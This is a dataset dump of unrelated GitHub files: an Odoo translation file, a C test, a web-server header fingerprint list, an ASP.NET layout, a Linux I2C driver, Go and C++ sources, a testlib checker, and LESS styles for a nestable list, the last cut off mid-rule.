text
stringlengths
2
100k
meta
dict
# Translation of Odoo Server. # This file contains the translation of the following modules: # * product_extended # # Translators: msgid "" msgstr "" "Project-Id-Version: Odoo 9.0\n" "Report-Msgid-Bugs-To: \n" "POT-Creation-Date: 2016-08-18 14:07+0000\n" "PO-Revision-Date: 2015-10-22 12:09+0000\n" "Last-Translator: Aleksandar Vangelovski <[email protected]>\n" "Language-Team: Macedonian (http://www.transifex.com/odoo/odoo-9/language/" "mk/)\n" "Language: mk\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: \n" "Plural-Forms: nplurals=2; plural=(n % 10 == 1 && n % 100 != 11) ? 0 : 1;\n" #. module: product_extended #: code:addons/product_extended/wizard/wizard_price.py:24 #: code:addons/product_extended/wizard/wizard_price.py:40 #, python-format msgid "Active ID is not set in Context." msgstr "Активниот идентификациски број не е подесен во Контекстот." #. module: product_extended #: model:ir.model,name:product_extended.model_mrp_bom msgid "Bill of Material" msgstr "Норматив" #. module: product_extended #: model_terms:ir.ui.view,arch_db:product_extended.view_compute_price_wizard msgid "Cancel" msgstr "Откажи" #. module: product_extended #: model_terms:ir.ui.view,arch_db:product_extended.view_compute_price_wizard msgid "Change Price" msgstr "Промени цена" #. module: product_extended #: model_terms:ir.ui.view,arch_db:product_extended.view_compute_price_wizard msgid "Change Standard Price" msgstr "Промени стандардна цена" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_recursive msgid "Change prices of child BoMs too" msgstr "Промени ги цените на под нормативите исто така" #. module: product_extended #: model:ir.actions.act_window,name:product_extended.action_view_compute_price_wizard #: model:ir.model,name:product_extended.model_wizard_price msgid "Compute Price Wizard" msgstr "Волшебник за пресметка на цени" #. module: product_extended #: model_terms:ir.ui.view,arch_db:product_extended.product_product_ext_form_view2 msgid "Compute from BOM" msgstr "" #. module: product_extended #: model_terms:ir.ui.view,arch_db:product_extended.product_product_ext_form_view2 msgid "" "Compute the price of the product using products and operations of related " "bill of materials, for manufactured products only." msgstr "" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_create_uid msgid "Created by" msgstr "Креирано од" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_create_date msgid "Created on" msgstr "Креирано на" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_display_name msgid "Display Name" msgstr "Прикажи име" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_real_time_accounting msgid "Generate accounting entries when real-time" msgstr "Генерирај сметководствени внесови кога реално" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_id msgid "ID" msgstr "ID" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_info_field msgid "Info" msgstr "Информација" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price___last_update msgid "Last Modified on" msgstr "Последна промена на" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_write_uid msgid "Last Updated by" msgstr "Последно ажурирање од" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_wizard_price_write_date msgid "Last Updated on" msgstr "Последно ажурирање на" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_mrp_bom_get_variant_count msgid "Number of variant for the product" msgstr "" #. module: product_extended #: model:ir.model,name:product_extended.model_product_template msgid "Product Template" msgstr "Урнек на производ" #. module: product_extended #: model_terms:ir.ui.view,arch_db:product_extended.view_compute_price_wizard msgid "Set price on BoM" msgstr "Подеси цена на норматив" #. module: product_extended #: model:ir.model.fields,field_description:product_extended.field_mrp_bom_standard_price msgid "Standard Price" msgstr "Стандардна цена" #. module: product_extended #: model_terms:ir.ui.view,arch_db:product_extended.view_compute_price_wizard msgid "" "The price is computed from the bill of material lines which are not variant " "specific" msgstr "" "Цената се оформува според сметката од ставките на материјалот кои што не се " "варијантно специфични" #. module: product_extended #: code:addons/product_extended/wizard/wizard_price.py:38 #, fuzzy, python-format msgid "" "This wizard is built for product templates, while you are currently running " "it from a product variant." msgstr "" "Овој волшебник е направен за урнеци на производи, додека моментално го " "користите од варијанта на производ." #~ msgid "Compute price wizard" #~ msgstr "Волшебник за пресметка на цени"
{ "pile_set_name": "Github" }
let v = A1_a2.v
{ "pile_set_name": "Github" }
#include <stdio.h> #include <stdlib.h> #include <assert.h> #include <string.h> #include <traildb.h> #include "tdb_test.h" static tdb *make_tdb(const char *root, const uint64_t *tstamps, uint32_t num, int should_fail) { static uint8_t uuid[16]; const char *fields[] = {}; tdb_cons* c = tdb_cons_init(); test_cons_settings(c); uint64_t zero = 0; uint32_t i; assert(tdb_cons_open(c, root, fields, 0) == 0); for (i = 0; i < num; i++) assert(tdb_cons_add(c, uuid, tstamps[i], fields, &zero) == 0); assert(tdb_cons_finalize(c) == (should_fail ? TDB_ERR_TIMESTAMP_TOO_LARGE: 0)); tdb_cons_close(c); if (!should_fail){ tdb* t = tdb_init(); assert(tdb_open(t, root) == 0); return t; }else return NULL; } int main(int argc, char** argv) { /* small min_timestamp, large max_timedelta, sorted */ const uint64_t TSTAMPS1[] = {1, 2, 3, UINT32_MAX, UINT32_MAX + 1LLU, TDB_MAX_TIMEDELTA - 10, TDB_MAX_TIMEDELTA - 9, TDB_MAX_TIMEDELTA - 8}; /* large min_timestamp, small max_timedelta, reverse order */ const uint64_t TSTAMPS2[] = {TDB_MAX_TIMEDELTA - 1, TDB_MAX_TIMEDELTA - 3, TDB_MAX_TIMEDELTA - 5}; /* this should not fail */ const uint64_t TSTAMPS3[] = {10, TDB_MAX_TIMEDELTA + 9}; /* this should fail */ const uint64_t TSTAMPS4[] = {10, TDB_MAX_TIMEDELTA + 11}; /* this should fail */ const uint64_t TSTAMPS5[] = {TDB_MAX_TIMEDELTA + 1}; const tdb_event *event; uint64_t i, num_events = sizeof(TSTAMPS1) / sizeof(TSTAMPS1[0]); tdb *db = make_tdb(getenv("TDB_TMP_DIR"), TSTAMPS1, num_events, 0); tdb_cursor *cursor = tdb_cursor_new(db); assert(tdb_get_trail(cursor, 0) == 0); for (i = 0; (event = tdb_cursor_next(cursor)); i++) assert(event->timestamp == TSTAMPS1[i]); assert(i == num_events); tdb_close(db); tdb_cursor_free(cursor); num_events = sizeof(TSTAMPS2) / sizeof(TSTAMPS2[0]); db = make_tdb(getenv("TDB_TMP_DIR"), TSTAMPS2, num_events, 0); cursor = tdb_cursor_new(db); assert(tdb_get_trail(cursor, 0) == 0); for (i = 1; (event = tdb_cursor_next(cursor)); i++) /* reverse order */ assert(event->timestamp == TSTAMPS2[num_events - i]); assert(i == num_events + 1); tdb_close(db); tdb_cursor_free(cursor); num_events = sizeof(TSTAMPS3) / sizeof(TSTAMPS3[0]); db = make_tdb(getenv("TDB_TMP_DIR"), TSTAMPS3, num_events, 0); cursor = tdb_cursor_new(db); assert(tdb_get_trail(cursor, 0) == 0); for (i = 0; (event = tdb_cursor_next(cursor)); i++) assert(event->timestamp == TSTAMPS3[i]); assert(i == num_events); tdb_close(db); tdb_cursor_free(cursor); make_tdb(getenv("TDB_TMP_DIR"), TSTAMPS4, sizeof(TSTAMPS4) / sizeof(TSTAMPS4[0]), 1); make_tdb(getenv("TDB_TMP_DIR"), TSTAMPS5, sizeof(TSTAMPS5) / sizeof(TSTAMPS5[0]), 1); return 0; }
{ "pile_set_name": "Github" }
Abyss 2.4.0.3 X2;no-cache Abyss 2.5.0.0 X1;no-cache AOLserver 3.3.1;No-Cache AOLserver 4.0.10a;no-cache AOLserver 4.0.10;no-cache AOLserver 4.5.0;no-cache Apache 1.3.26;no-cache Apache 1.3.27;no-cache Apache 1.3.33;no-cache Apache 1.3.34;no-cache Apache 1.3.37;no-cache Apache 1.3.39;no-cache Apache 2.0.45;no-cache Apache 2.0.46;no-cache Apache 2.0.52;no-cache Apache 2.0.54;no-cache Apache 2.0.59;nocache Apache 2.0.59;No-cache Apache 2.2.2;no-cache Apache 2.2.3;no-cache Apache 2.2.3;private Apache 2.2.4;no-cache Apache 2.2.6;no-cache Belkin Router 2.00.002;no-cache Cherokee 0.6.0;no-cache Cisco VPN 3000 Concentrator Virata EmWeb R6.2.0;no-cache Cougar 9.5.6001.6264;no-cache FlexWATCH FW-3440-B;no-cache fnord 1.8a;no-cache GlobalSCAPE Secure Server 3.3;no-cache Hiawatha 6.11;no-cache Hiawatha 6.2;no-cache IBM HTTP Server 6.0.2.19;no-cache IceWarp 8.3.0;no-cache Jana-Server 2.4.8.51;no-cache Jetty 6.1.1;no-cache lighttpd 1.4.19;no-cache lighttpd 1.4.22;no-cache LiteSpeed Web Server 3.3;no-cache Microsoft IIS 6.0;no-cache Nanoweb 2.2.10;no-cache nginx 0.5.32;no-cache nginx 0.5.35;no-cache nginx 0.6.16;no-cache nginx 0.6.20;no-cache Novell Access Manager 3;no-cache Ricoh Aficio 1022 Web-Server 3.0;no-cache Ricoh Aficio 1045 5.23 Web-Server 3.0;no-cache Ricoh Aficio 1060 3.53.3 Web-Server 3.0;no-cache Ricoh Aficio 6002 3.53.3 Web-Server 3.0;no-cache Roxen 2.2.213;no-cache SnapStream Digital Video Recorder;no-cache Sony SNC-RZ30 NetEVI 1.09;no-cache Sony SNC-RZ30 NetEVI 2.05g;no-cache Sony SNC-RZ30 NetEVI 2.05;no-cache Sony SNC-RZ30 NetEVI 2.06;no-cache Sony SNC-RZ30 NetEVI 2.13;no-cache Sony SNC-RZ30 NetEVI 2.14;no-cache Sony SNC-RZ30 NetEVI 2.24;no-cache Sony SNC-RZ30 NetEVI 3.01;no-cache Sony SNC-RZ30 NetEVI 3.02;no-cache Sony SNC-RZ30 NetEVI 3.03;no-cache Sony SNC-RZ30 NetEVI 3.10a;no-cache Sony SNC-RZ30 NetEVI 3.10;no-cache Sony SNC-RZ30 NetEVI 3.14;no-cache Sony SNC-Z20 NetZoom 1.00;no-cache Symantec Mail Security for SMTP;No-Cache WDaemon 9.6.1;no-cache webcamXP PRO 2006 2.16.456x BETA;no-cache webcamXP PRO 2006 2.20.024;no-cache webcamXP PRO 2006 2.37.144;no-cache webcamXP PRO 2007 3.60.220;no-cache webcamXP PRO 2007 3.72.440;no-cache webcamXP PRO 2007 3.96.000 beta;no-cache Zope 2.6.0;no-cache Zyxel P-2602HW-D1A RomPager 4.51;no-cache Zyxel P-660R-D3 RomPager 4.51;no-cache Zyxel P-661H-D1 RomPager 4.51;no-cache Zyxel P-662HW-D1 RomPager 4.51;no-cache Zyxel Prestige 662H-61 RomPager 4.07;no-cache Zyxel Prestige 662H-63/67 RomPager 4.07;no-cache Zyxel ZyWALL 10W RomPager 4.07;no-cache
{ "pile_set_name": "Github" }
<button class="bx-btn bx-btn-img" __extended_css__ __extended_action__> <u style="background-image:url(__action_img_src__)">__action_caption__</u> </button>
{ "pile_set_name": "Github" }
package request import ( "io" "sync" ) // offsetReader is a thread-safe io.ReadCloser to prevent racing // with retrying requests type offsetReader struct { buf io.ReadSeeker lock sync.Mutex closed bool } func newOffsetReader(buf io.ReadSeeker, offset int64) *offsetReader { reader := &offsetReader{} buf.Seek(offset, 0) reader.buf = buf return reader } // Close will close the instance of the offset reader's access to // the underlying io.ReadSeeker. func (o *offsetReader) Close() error { o.lock.Lock() defer o.lock.Unlock() o.closed = true return nil } // Read is a thread-safe read of the underlying io.ReadSeeker func (o *offsetReader) Read(p []byte) (int, error) { o.lock.Lock() defer o.lock.Unlock() if o.closed { return 0, io.EOF } return o.buf.Read(p) } // Seek is a thread-safe seeking operation. func (o *offsetReader) Seek(offset int64, whence int) (int64, error) { o.lock.Lock() defer o.lock.Unlock() return o.buf.Seek(offset, whence) } // CloseAndCopy will return a new offsetReader with a copy of the old buffer // and close the old buffer. func (o *offsetReader) CloseAndCopy(offset int64) *offsetReader { o.Close() return newOffsetReader(o.buf, offset) }
{ "pile_set_name": "Github" }
/**************************************************************************** Copyright (c) 2010-2012 cocos2d-x.org Copyright (c) 2013-2014 Chukong Technologies Inc. http://www.cocos2d-x.org Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ****************************************************************************/ #ifndef __SUPPORT_BASE64_H__ #define __SUPPORT_BASE64_H__ #ifdef __cplusplus extern "C" { #endif namespace cocos2d { /** @file base64 helper functions */ /** * Decodes a 64base encoded memory. The decoded memory is * expected to be freed by the caller by calling `free()` * * @returns the length of the out buffer * @since v0.8.1 */ int base64Decode(const unsigned char *in, unsigned int inLength, unsigned char **out); /** * Encodes bytes into a 64base encoded memory with terminating '\0' character. * The encoded memory is expected to be freed by the caller by calling `free()` * * @returns the length of the out buffer * @since v2.1.4 */ int base64Encode(const unsigned char *in, unsigned int inLength, char **out); }//namespace cocos2d #ifdef __cplusplus } #endif #endif // __SUPPORT_BASE64_H__
{ "pile_set_name": "Github" }
//========= Copyright Valve Corporation, All rights reserved. ============// // // Purpose: // // $NoKeywords: $ // //=====================================================================================// #ifndef SCREENSPACEEFFECTS_H #define SCREENSPACEEFFECTS_H #ifdef _WIN32 #pragma once #endif class KeyValues; //------------------------------------------------------------------------------ // Simple base class for screen space post-processing effects //------------------------------------------------------------------------------ abstract_class IScreenSpaceEffect { public: virtual void Init( ) = 0; virtual void Shutdown( ) = 0; virtual void SetParameters( KeyValues *params ) = 0; virtual void Render( int x, int y, int w, int h ) = 0; virtual void Enable( bool bEnable ) = 0; virtual bool IsEnabled( ) = 0; }; //------------------------------------------------------------------------------ // Interface class for managing screen space post-processing effects //------------------------------------------------------------------------------ abstract_class IScreenSpaceEffectManager { public: virtual void InitScreenSpaceEffects( ) = 0; virtual void ShutdownScreenSpaceEffects( ) = 0; virtual IScreenSpaceEffect *GetScreenSpaceEffect( const char *pEffectName ) = 0; virtual void SetScreenSpaceEffectParams( const char *pEffectName, KeyValues *params ) = 0; virtual void SetScreenSpaceEffectParams( IScreenSpaceEffect *pEffect, KeyValues *params ) = 0; virtual void EnableScreenSpaceEffect( const char *pEffectName ) = 0; virtual void EnableScreenSpaceEffect( IScreenSpaceEffect *pEffect ) = 0; virtual void DisableScreenSpaceEffect( const char *pEffectName ) = 0; virtual void DisableScreenSpaceEffect( IScreenSpaceEffect *pEffect ) = 0; virtual void DisableAllScreenSpaceEffects( ) = 0; virtual void RenderEffects( int x, int y, int w, int h ) = 0; }; extern IScreenSpaceEffectManager *g_pScreenSpaceEffects; //------------------------------------------------------------------------------------- // Registration class for adding screen space effects to the IScreenSpaceEffectManager //------------------------------------------------------------------------------------- class CScreenSpaceEffectRegistration { public: CScreenSpaceEffectRegistration( const char *pName, IScreenSpaceEffect *pEffect ); const char *m_pEffectName; IScreenSpaceEffect *m_pEffect; CScreenSpaceEffectRegistration *m_pNext; static CScreenSpaceEffectRegistration *s_pHead; }; #define ADD_SCREENSPACE_EFFECT( CEffect, pEffectName ) CEffect pEffectName##_effect; \ CScreenSpaceEffectRegistration pEffectName##_reg( #pEffectName, &pEffectName##_effect ); #endif
{ "pile_set_name": "Github" }
/** * Checker to compare output and answer in the form: * * Case 1: <token> <token> ... <token> * Case 2: <token> <token> ... <token> * ... * Case n: <token> <token> ... <token> * */ #include "testlib.h" #include <iostream> #include <sstream> #include <fstream> #include <iomanip> #include <string> #include <cstdlib> #include <cstdio> #include <cstring> #include <cmath> #include <ctime> #include <climits> #include <cassert> #include <vector> #include <queue> #include <stack> #include <deque> #include <set> #include <map> #include <bitset> #include <utility> #include <algorithm> using namespace std; #define forn(i, n) for (int i = 0; i < int(n); i++) string token; vector<string> readStreamCase(InStream& in, TResult pe, int testCase, bool& prereadCase) { if (!prereadCase) { string caseStr = in.readToken(); if (caseStr != "Case") quitf(pe, "Expected 'Case' but found '%s' [test case %d]", compress(caseStr).c_str(), testCase); } string numExpStr; stringstream ss; ss << testCase; ss >> numExpStr; numExpStr += ":"; string numStr = in.readToken(); if (numExpStr != numStr) quitf(pe, "Expected '%s' but found '%s' [test case %d]", compress(numExpStr).c_str(), compress(numStr).c_str(), testCase); vector<string> result; while (!in.seekEof()) { in.readTokenTo(token); if (token == "Case") { prereadCase = true; break; } result.push_back(token); } return result; } string stringsToString(const vector<string>& a) { if (a.empty()) return "\"\" [size=0]"; string elems; forn(i, a.size()) elems += a[i] + " "; return format("\"%s\" [size=%u]", compress(trim(elems)).c_str(), (unsigned int)(a.size())); } int main(int argc, char* argv[]) { setName("Tokens checker with testcase-support"); registerTestlibCmd(argc, argv); int testCase = 0; bool ansPrereadCase = false; bool oufPrereadCase = false; while (!ans.seekEof()) { testCase++; vector<string> ja = readStreamCase(ans, _fail, testCase, ansPrereadCase); vector<string> pa = readStreamCase(ouf, _pe, testCase, oufPrereadCase); if (ja != pa) { string js = stringsToString(ja); string ps = stringsToString(pa); quitf(_wa, "Sequences differ: jury has %s, but participant has %s [test case %d]", js.c_str(), ps.c_str(), testCase); } } quitf(_ok, "%d test cases(s)", testCase); }
{ "pile_set_name": "Github" }
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>@ViewData["Title"] - WebStartup.Web</title> <environment include="Development"> <link rel="stylesheet" href="~/lib/bootstrap/dist/css/bootstrap.css" /> </environment> <environment exclude="Development"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css" asp-fallback-href="~/lib/bootstrap/dist/css/bootstrap.min.css" asp-fallback-test-class="sr-only" asp-fallback-test-property="position" asp-fallback-test-value="absolute" crossorigin="anonymous" integrity="sha256-eSi1q2PG6J7g7ib17yAaWMcrr5GrtohYChqibrV7PBE="/> </environment> <link rel="stylesheet" href="~/css/site.css" /> </head> <body> <header> <nav class="navbar navbar-expand-sm navbar-toggleable-sm navbar-light bg-white border-bottom box-shadow mb-3"> <div class="container"> <a class="navbar-brand" asp-area="" asp-controller="Home" asp-action="Index">WebStartup.Web</a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target=".navbar-collapse" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <span class="navbar-toggler-icon"></span> </button> <div class="navbar-collapse collapse d-sm-inline-flex flex-sm-row-reverse"> <ul class="navbar-nav flex-grow-1"> <li class="nav-item"> <a class="nav-link text-dark" asp-area="" asp-controller="Home" asp-action="Index">Home</a> </li> <li class="nav-item"> <a class="nav-link text-dark" asp-area="" asp-controller="Home" asp-action="Privacy">Privacy</a> </li> </ul> </div> </div> </nav> </header> <div class="container"> <partial name="_CookieConsentPartial" /> <main role="main" class="pb-3"> @RenderBody() </main> </div> <footer class="border-top footer text-muted"> <div class="container"> &copy; 2019 - WebStartup.Web - <a asp-area="" asp-controller="Home" asp-action="Privacy">Privacy</a> </div> </footer> <environment include="Development"> <script src="~/lib/jquery/dist/jquery.js"></script> <script src="~/lib/bootstrap/dist/js/bootstrap.bundle.js"></script> </environment> <environment exclude="Development"> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js" asp-fallback-src="~/lib/jquery/dist/jquery.min.js" asp-fallback-test="window.jQuery" crossorigin="anonymous" integrity="sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8="> </script> <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/js/bootstrap.bundle.min.js" asp-fallback-src="~/lib/bootstrap/dist/js/bootstrap.bundle.min.js" asp-fallback-test="window.jQuery && window.jQuery.fn && window.jQuery.fn.modal" crossorigin="anonymous" integrity="sha256-E/V4cWE4qvAeO5MOhjtGtqDzPndRO1LBk8lJ/PR7CA4="> </script> </environment> <script src="~/js/site.js" asp-append-version="true"></script> @RenderSection("Scripts", required: false) </body> </html>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <style xmlns="http://purl.org/net/xbiblio/csl" version="1.0" default-locale="en-US"> <!-- Generated with https://github.com/citation-style-language/utilities/tree/master/generate_dependent_styles/data/springer --> <info> <title>Triple Helix</title> <id>http://www.zotero.org/styles/triple-helix</id> <link href="http://www.zotero.org/styles/triple-helix" rel="self"/> <link href="http://www.zotero.org/styles/springer-basic-author-date" rel="independent-parent"/> <link href="http://www.springer.com/cda/content/document/cda_downloaddocument/Key_Style_Points_1.0.pdf" rel="documentation"/> <link href="http://www.springer.com/cda/content/document/cda_downloaddocument/manuscript-guidelines-1.0.pdf" rel="documentation"/> <category citation-format="author-date"/> <eissn>2197-1927</eissn> <updated>2014-05-15T12:00:00+00:00</updated> <rights license="http://creativecommons.org/licenses/by-sa/3.0/">This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License</rights> </info> </style>
{ "pile_set_name": "Github" }
/* * Copyright (C) 2005 Simtec Electronics * Ben Dooks <[email protected]> * * Simtec Generic I2C Controller * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #include <linux/kernel.h> #include <linux/module.h> #include <linux/init.h> #include <linux/delay.h> #include <linux/platform_device.h> #include <linux/slab.h> #include <linux/io.h> #include <linux/i2c.h> #include <linux/i2c-algo-bit.h> struct simtec_i2c_data { struct resource *ioarea; void __iomem *reg; struct i2c_adapter adap; struct i2c_algo_bit_data bit; }; #define CMD_SET_SDA (1<<2) #define CMD_SET_SCL (1<<3) #define STATE_SDA (1<<0) #define STATE_SCL (1<<1) /* i2c bit-bus functions */ static void simtec_i2c_setsda(void *pw, int state) { struct simtec_i2c_data *pd = pw; writeb(CMD_SET_SDA | (state ? STATE_SDA : 0), pd->reg); } static void simtec_i2c_setscl(void *pw, int state) { struct simtec_i2c_data *pd = pw; writeb(CMD_SET_SCL | (state ? STATE_SCL : 0), pd->reg); } static int simtec_i2c_getsda(void *pw) { struct simtec_i2c_data *pd = pw; return readb(pd->reg) & STATE_SDA ? 1 : 0; } static int simtec_i2c_getscl(void *pw) { struct simtec_i2c_data *pd = pw; return readb(pd->reg) & STATE_SCL ? 1 : 0; } /* device registration */ static int simtec_i2c_probe(struct platform_device *dev) { struct simtec_i2c_data *pd; struct resource *res; int size; int ret; pd = kzalloc(sizeof(struct simtec_i2c_data), GFP_KERNEL); if (pd == NULL) { dev_err(&dev->dev, "cannot allocate private data\n"); return -ENOMEM; } platform_set_drvdata(dev, pd); res = platform_get_resource(dev, IORESOURCE_MEM, 0); if (res == NULL) { dev_err(&dev->dev, "cannot find IO resource\n"); ret = -ENOENT; goto err; } size = resource_size(res); pd->ioarea = request_mem_region(res->start, size, dev->name); if (pd->ioarea == NULL) { dev_err(&dev->dev, "cannot request IO\n"); ret = -ENXIO; goto err; } pd->reg = ioremap(res->start, size); if (pd->reg == NULL) { dev_err(&dev->dev, "cannot map IO\n"); ret = -ENXIO; goto err_res; } /* setup the private data */ pd->adap.owner = THIS_MODULE; pd->adap.algo_data = &pd->bit; pd->adap.dev.parent = &dev->dev; strlcpy(pd->adap.name, "Simtec I2C", sizeof(pd->adap.name)); pd->bit.data = pd; pd->bit.setsda = simtec_i2c_setsda; pd->bit.setscl = simtec_i2c_setscl; pd->bit.getsda = simtec_i2c_getsda; pd->bit.getscl = simtec_i2c_getscl; pd->bit.timeout = HZ; pd->bit.udelay = 20; ret = i2c_bit_add_bus(&pd->adap); if (ret) goto err_all; return 0; err_all: iounmap(pd->reg); err_res: release_resource(pd->ioarea); kfree(pd->ioarea); err: kfree(pd); return ret; } static int simtec_i2c_remove(struct platform_device *dev) { struct simtec_i2c_data *pd = platform_get_drvdata(dev); i2c_del_adapter(&pd->adap); iounmap(pd->reg); release_resource(pd->ioarea); kfree(pd->ioarea); kfree(pd); return 0; } /* device driver */ static struct platform_driver simtec_i2c_driver = { .driver = { .name = "simtec-i2c", .owner = THIS_MODULE, }, .probe = simtec_i2c_probe, .remove = simtec_i2c_remove, }; module_platform_driver(simtec_i2c_driver); MODULE_DESCRIPTION("Simtec Generic I2C Bus driver"); MODULE_AUTHOR("Ben Dooks <[email protected]>"); MODULE_LICENSE("GPL"); MODULE_ALIAS("platform:simtec-i2c");
{ "pile_set_name": "Github" }
/* * rl6347a.h - RL6347A class device shared support * * Copyright 2015 Realtek Semiconductor Corp. * * Author: Oder Chiou <[email protected]> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 as * published by the Free Software Foundation. */ #ifndef __RL6347A_H__ #define __RL6347A_H__ #include <sound/hda_verbs.h> #define VERB_CMD(V, N, D) ((N << 20) | (V << 8) | D) #define RL6347A_VENDOR_REGISTERS 0x20 #define RL6347A_COEF_INDEX\ VERB_CMD(AC_VERB_SET_COEF_INDEX, RL6347A_VENDOR_REGISTERS, 0) #define RL6347A_PROC_COEF\ VERB_CMD(AC_VERB_SET_PROC_COEF, RL6347A_VENDOR_REGISTERS, 0) struct rl6347a_priv { struct reg_default *index_cache; int index_cache_size; }; int rl6347a_hw_write(void *context, unsigned int reg, unsigned int value); int rl6347a_hw_read(void *context, unsigned int reg, unsigned int *value); #endif /* __RL6347A_H__ */
{ "pile_set_name": "Github" }
## Example: Virtual Network with a Network Security Group This example provisions a Virtual Network containing a single Subnet, with a Network Security Group.
{ "pile_set_name": "Github" }
.enable_plugin_nestable_list() when(@enable-plugin-nestable-list = true) { .dd { position: relative; display: block; margin: 0; padding: 0; max-width: 600px; list-style: none; line-height: 20px; } .dd-list { display: block; position: relative; margin: 0; padding: 0; list-style: none; .dd-list { padding-left: 30px; } .dd-collapsed & { display: none; } } .dd-item, .dd-empty, .dd-placeholder { display: block; position: relative; margin: 0; padding: 0; min-height: 20px; line-height: 20px; } .dd-handle , .dd2-content { display: block; min-height: 38px; margin: 5px 0; padding: 8px 12px; background: #F8FAFF; border: 1px solid #DAE2EA; color: #7C9EB2; text-decoration: none; font-weight: bold; .box-sizing(border-box); &:hover { color: #438EB9; background: #F4F6F7; border-color:#DCE2E8; } &[class*="btn-"] { color:#FFF; border:none; padding: 9px 12px; &:hover { opacity:0.85; color:#FFF; } } } .dd2-handle + .dd2-content, .dd2-handle + .dd2-content[class*="btn-"] { padding-left:44px; } .dd-handle[class*="btn-"]:hover , .dd2-content[class*="btn-"] .dd2-handle[class*="btn-"]:hover + .dd2-content[class*="btn-"] { //opacity:0.85; color:#FFF; } .dd-item > button:hover { ~ .dd-handle , ~ .dd2-content { color: #438EB9; background: #F4F6F7; border-color:#DCE2E8; } ~ .dd-handle[class*="btn-"] , ~ .dd2-content[class*="btn-"] { opacity:0.85; color:#FFF; } } .dd2-handle:hover { ~ .dd2-content { color: #438EB9; background: #F4F6F7; border-color:#DCE2E8; } ~ .dd2-content[class*="btn-"] { opacity:0.85; color:#FFF; } } .dd2-item.dd-item > button { margin-left:34px; } .dd-item > button { display: block; position: relative; z-index:1; cursor: pointer; float: left; width: 25px; height: 20px; margin: 5px 1px 5px 5px; padding: 0; text-indent: 100%; white-space: nowrap; overflow: hidden; border: 0; background: transparent; font-size: @base-font-size - 1; line-height: 1; text-align: center; font-weight: bold; top:4px; left:1px; color:#707070; } .dd-item > button:before { font-family: FontAwesome; content: '\f067'; display: block; position: absolute; width: 100%; text-align: center; text-indent: 0; font-weight: normal; font-size: @base-font-size + 1; } .dd-item > button[data-action="collapse"]:before { content: '\f068'; } .dd-item > button:hover { color:#707070; } .dd-item.dd-colored > button , .dd-item.dd-colored > button:hover { color:#EEE; } .dd-placeholder, .dd-empty { margin: 5px 0; padding: 0; min-height: 30px; background: #F0F9FF; border: 2px dashed #BED2DB; .box-sizing(border-box); } .dd-empty { border-color:#AAA; border-style:solid; background-color: #e5e5e5; } .dd-dragel { position: absolute; pointer-events: none; z-index: 999; opacity:0.8; > li > .dd-handle { color:#4B92BE; background:#F1F5FA; border-color:#D6E1EA; //opacity:0.85; border-left:2px solid #777; position:relative; &[class*="btn-"] { color:#FFF; } } } .dd-dragel > .dd-item > .dd-handle { margin-top: 0; } .dd-list > li[class*="item-"] { border-width:0;padding:0; > .dd-handle { border-left:2px solid; border-left-color:inherit; } } .dd-list > li > .dd-handle .sticker { position:absolute; right:0; top:0; } .dd2-handle , .dd-dragel > li > .dd2-handle { position:absolute; left:0; top:0; width:36px; margin:0; border-width:1px 1px 0 0; text-align:center; padding:0 !important; line-height:38px; height:38px; background: #EBEDF2; border: 1px solid #DEE4EA; cursor: pointer; overflow: hidden; position: absolute; z-index:1; } .dd2-handle:hover , .dd-dragel > li > .dd2-handle{ background:#E3E8ED; } .dd2-content[class*="btn-"] { text-shadow:none !important; } .dd2-handle[class*="btn-"] { text-shadow:none !important; background:rgba(0,0,0,0.1) !important; border-right:1px solid #EEE; } .dd2-handle[class*="btn-"]:hover { background:rgba(0,0,0,0.08) 